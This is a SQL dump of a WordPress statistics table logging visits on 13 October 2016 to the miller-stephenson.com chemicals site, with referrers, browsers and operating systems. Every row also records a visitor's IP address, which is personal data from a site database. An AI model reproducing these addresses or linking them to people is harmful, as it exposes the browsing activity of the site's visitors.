INSERT INTO `wp_statistics_visitor` VALUES (3645, '2016-10-13', 'https://www.miller-stephenson.com/', 'Firefox', 'Linux', '34.0', '', '192.198.80.227', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3646, '2016-10-13', 'https://www.google.co.il/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0ahUKEwiSvuqs29fPAhWhOsAKHV2XDrIQFghEMAk&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-122ad%2F&usg=AFQjCNGaatYUc67tZ_hVRy9-Evo194BfKA', 'MSIE', 'Windows', '11.0', '', '80.179.47.131', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3647, '2016-10-13', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjW4LeC3dfPAhWXJYEKHcxeA5IYABAA&sig=AOD64_37iJg4tOAhrnHS9wxRqTfhU5T7ng&rct=j&q=&ved=0ahUKEwj8wLSC3dfPAhVGjz4KHWdRA5cQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '65.209.181.185', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3648, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '124.176.54.184', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3649, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3650, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '198.208.251.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3651, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3652, '2016-10-13', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3653, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '45.0', '', '134.94.80.10', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3654, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwiNg4y94dfPAhXolFQKHZLaAdAQjBAILTAC&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2F&usg=AFQjCNHbwMDofHjUU2PB95SWZra5M3XNKA', 'MSIE', 'Windows', '11.0', '', '10.173.75.103', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3655, '2016-10-13', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.01', '', '182.186.235.190', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3656, '2016-10-13', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.1', '', '216.8.226.246', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3657, '2016-10-13', 'https://www.google.com.tr/', 'Chrome', 'Windows', '53.0.2785.143', '', '85.96.182.215', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3658, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.24', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3659, '2016-10-13', 'https://www.miller-stephenson.com/krytox-agl-683-gearbox-grease/', 'MSIE', 'Windows', '9.0', '', '204.79.180.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3660, '2016-10-13', 'https://www.miller-stephenson.com/?s=IPA&post_type=product', 'Chrome', 'Windows', '53.0.2785.143', '', '107.170.118.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3661, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwj8sfjS5NfPAhXM5yYKHTe1CVwQFggpMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.eWE', 'MSIE', 'Windows', '11.0', '', '132.26.121.33', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3662, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.11.9600.18499', '', '173.167.26.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3663, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.139', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3664, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.24', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3665, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.68.155.190', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3666, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3667, '2016-10-13', 'https://www.miller-stephenson.com/krytox-tm7-tire-mold-industry/', 'MSIE', 'Windows', '9.0', '', '204.79.180.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3668, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjT3YjN59fPAhUCqB4KHWiYDqQQFggoMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '173.65.168.142', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3669, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.70.69.221', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3670, '2016-10-13', 'https://www.bing.com/search?q=high+temp+release+agents&src=IE-SearchBox&FORM=IESR02&adlt=strict', 'MSIE', 'Windows', '11.0', '', '69.18.37.6', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3671, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '85.105.201.188', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3672, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '54.70.64.140', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3673, '2016-10-13', 'https://www.miller-stephenson.com', 'solfo-linkchecker', 'Unknown', '1.0', '', '199.15.176.242', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3674, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '206.253.154.28', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3675, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '41.33.248.226', '000', 29, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3676, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.85', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3677, '2016-10-13', 'https://www.miller-stephenson.com/krytox-valve-lubricants/', 'MSIE', 'Windows', '9.0', '', '204.79.180.229', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3678, '2016-10-13', 'https://www.bing.com/search?q=miller+stephenson+chemical+company&src=IE-SearchBox&FORM=IENTSR', 'MSIE', 'Windows', '11.0', '', '66.3.7.50', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3679, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '38.0.2125.122', '', '67.205.130.17', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3680, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '162.216.105.203', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3681, '2016-10-13', 'https://www.google.com/', 'MSIE', 'Windows', '9.0', '', '101.226.61.206', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3682, '2016-10-13', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '101.226.33.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3683, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.51.229', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3684, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3685, '2016-10-13', 'https://www.domain2008.com/', 'MSIE', 'Windows', '9.0', '', '192.157.231.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3686, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.254.68.126', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3687, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '50.198.22.188', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3688, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '75.145.224.249', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3689, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '65.156.188.66', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3690, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '172.110.5.208', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3691, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '68.199.10.99', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3692, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '205.175.240.245', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3693, '2016-10-13', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=2&ved=0ahUKEwi2u6rQ99fPAhVFyFQKHbCkADAQFggnMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q', 'MSIE', 'Windows', '7.0', '', '110.14.62.24', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3694, '2016-10-13', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '70.194.193.80', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3695, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '30.0.1599.69', '', '222.122.190.78', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3696, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '108.189.71.173', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3697, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '213.189.136.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3698, '2016-10-13', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '174.47.212.222', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3699, '2016-10-13', 'https://www.bing.com/search?q=krytox%20xht-acx&PC=RIMBINGD&A=results', 'BlackBerry Browser', 'BlackBerry', '10.3.2.2639', '', '216.4.56.170', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3700, '2016-10-13', 'https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.203.199.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3701, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '207.238.205.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3702, '2016-10-13', 'https://www.google.com.br/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=2&ved=0ahUKEwiduZ27_tfPAhXEWSYKHf7qDE8QFggkMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-472c%2F&usg=AFQjCNHAgQ1vRxNnRmFNQQq89MyGhoEHuA&bvm=bv.135475266,d.eWE', 'MSIE', 'Windows', '10.0', '', '200.174.129.132', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3703, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.43.234.225', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3704, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiHnO2m_9fPAhVLKiYKHUnLCqUQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q', 'MSIE', 'Windows', '11.0', '', '70.208.87.212', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3705, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3706, '2016-10-13', 'https://r.search.yahoo.com/_ylt=AwrSbhuNmv9XaywAggxXNyoA;_ylu=X3oDMTByb2lvbXVuBGNvbG8DZ3ExBHBvcwMxBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1476397838/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=nuIgCmOFol4_JTdjCTvCOao1d_w-', 'MSIE', 'Windows', '11.0', '', '107.3.170.235', '000', 36, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3707, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '50.204.254.114', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3708, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjDg5iQgNjPAhWC8z4KHd90AhsQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.cWw', 'MSIE', 'Windows', '11.0', '', '165.97.36.109', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3709, '2016-10-13', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.195.50.6', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3710, '2016-10-13', 'https://r.search.yahoo.com/_ylt=AwrSbnuAnP9XCjYA7vBXNyoA;_ylu=X3oDMTEybXMwZmhwBGNvbG8DZ3ExBHBvcwMxBHZ0aWQDVUkyQzJfMQRzZWMDc3I-/RV=2/RE=1476398336/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=4Yaf0noA0aA0_GRCMn15E9asxys-', 'MSIE', 'Windows', '11.0', '', '38.72.105.86', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3711, '2016-10-13', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '70.66.5.116', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3712, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3713, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3714, '2016-10-13', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '135.12.16.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3715, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.203.1.246', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3716, '2016-10-13', 'https://portomaltese.net/', 'MSIE', 'Windows', '6.0', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3717, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '95.90.225.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3718, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.149.217.49', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3719, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.157.229.122', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3720, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.161.156.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3721, '2016-10-13', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/', 'BlackBerry Browser', 'BlackBerry', '10.3.2.2639', '', '66.190.120.115', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3722, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwibm5fLhdjPAhWB5SYKHcAUAOQQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.eWE', 'MSIE', 'Windows', '11.0', '', '65.249.12.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3723, '2016-10-13', 'https://mmr.mschem.com/miller/pdf/Heloxy.pdf', 'Chrome', 'Windows', '51.0.2683.0', '', '97.76.148.98', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3724, '2016-10-13', 'https://www.google.co.uk/', 'Chrome', 'Windows', '53.0.2785.143', '', '84.43.115.138', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3725, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.190.10.46', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3726, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '28.0', '', '146.0.74.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3727, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '41.33.248.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3728, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '148.163.178.15', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3729, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '36.0', '', '185.117.73.65', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3730, '2016-10-13', 'https://www.miller-stephenson.com', 'python-requests', 'Unknown', '2.11.1', '', '185.117.73.65', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3731, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '75.78.103.8', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3732, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '50.0.2661.102', '', '216.152.103.26', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3733, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.150.252', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3734, '2016-10-13', 'https://www.miller-stephenson.com/product/vazo-88/', 'MSIE', 'Windows', '11.0', '', '206.167.137.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3735, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '12.198.210.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3736, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '47.23.29.18', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3737, '2016-10-13', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '53.0.2785.143', '', '50.151.36.144', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3738, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '168.65.231.235', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3739, '2016-10-13', 'https://www.google.com/url?url=https://www.miller-stephenson.com/chemicals/release-agents/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwjJjqXijNjPAhWBdR4KHT-MDtoQFghEMAA&usg=AFQjCNEEEdrqzis_OcxM5npgX8tBA9v9hw', 'MSIE', 'Windows', '9.0', '', '98.254.97.135', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3740, '2016-10-13', 'https://expo.spacecomexpo.com/SPC16/Public/eBooth.aspx?IndexInList=42&FromPage=Exhibitors.aspx&ParentBoothID=&ListByBooth=true&BoothID=322899&Nav=False', 'Chrome', 'Windows', '53.0.2785.143', '', '182.69.89.100', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3741, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '158.69.237.99', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3742, '2016-10-13', 'https://www.google.com.uy/', 'Chrome', 'Windows', '53.0.2785.143', '', '200.40.182.150', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3743, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '24.63.154.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3744, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '128.101.218.67', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3745, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3746, '2016-10-13', 'https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/', 'MSIE', 'Windows', '9.0', '', '204.79.180.239', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3747, '2016-10-13', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '42.236.10.98', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3748, '2016-10-13', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi7i6y1ktjPAhWBgH4KHXeGDqQYABAA&sig=AOD64_25cXEmo_wNDFdThFEhUu3zL1sFgg&rct=j&q=&ved=0ahUKEwiljqe1ktjPAhXHMSYKHW8LDf4Q0QwIHA&adurl=', 'MSIE', 'Windows', '11.0', '', '192.31.106.36', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3749, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '44.0', '', '149.137.255.213', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3750, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.89.95.239', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3751, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '37.152.46.90', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3752, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '96.90.100.185', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3753, '2016-10-13', 'https://www.bing.com/search?q=miller+stephenson+contact+lubricants&src=IE-SearchBox&FORM=IENTTR&conversationid=&adlt=strict', 'MSIE', 'Windows', '11.0', '', '199.46.250.149', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3754, '2016-10-13', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjCr7HbldjPAhWPNoEKHf9kBbUYABAC&sig=AOD64_3bAxvNE6lwNGc5iqafVXXMBre4UA&rct=j&q=&ved=0ahUKEwjGga3bldjPAhVDGj4KHb2jAFAQ0QwIKg&adurl=', 'MSIE', 'Windows', '11.0', '', '24.73.253.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3755, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '28.0', '', '178.32.139.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3756, '2016-10-13', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '216.197.145.240', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3757, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '47.21.231.134', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3758, '2016-10-13', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '69.11.16.103', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3759, '2016-10-13', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '70.70.234.248', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3760, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwifuPPzmtjPAhWHilQKHYHeBukQFgg8MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-828%2F&usg=AFQjCNG-ULz5hPi_elA0tDheufF5SIOMyg', 'MSIE', 'Windows', '11.0', '', '152.121.19.251', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3761, '2016-10-13', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '98.140.180.252', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3762, '2016-10-13', 'https://www.miller-stephenson.com/', 'Firefox', 'Linux', '34.0', '', '107.150.87.174', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3763, '2016-10-13', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '107.150.87.174', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3764, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '64.184.0.98', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3765, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.53', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3766, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwig9K2vmdjPAhUE1CYKHbhQAKcQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=slYOGlJ8JTb8S_PY8udfPQ', 'MSIE', 'Windows', '11.0', '', '132.119.254.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3767, '2016-10-13', 'https://www.miller-stephenson.com', 'ELinks', 'Linux', '0.12pre5', '', '96.46.157.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3768, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjChYXXndjPAhWGTSYKHQ7yBNIQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.eWE', 'MSIE', 'Windows', '11.0', '', '132.3.37.82', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3769, '2016-10-13', 'https://www.miller-stephenson.com/notify-SubZero?aHR0cDovL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb20v;+A0jSM0O/h3IJ7KQsyy5T1fuG06JnrKz609jNvqVZKw=', 'MSIE', 'Windows', '11.0', '', '132.3.37.80', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3770, '2016-10-13', 'https://www.miller-stephenson.com/tech-support/sds/', 'MSIE', 'Windows', '11.0', '', '132.3.37.84', '000', 7, 0); 
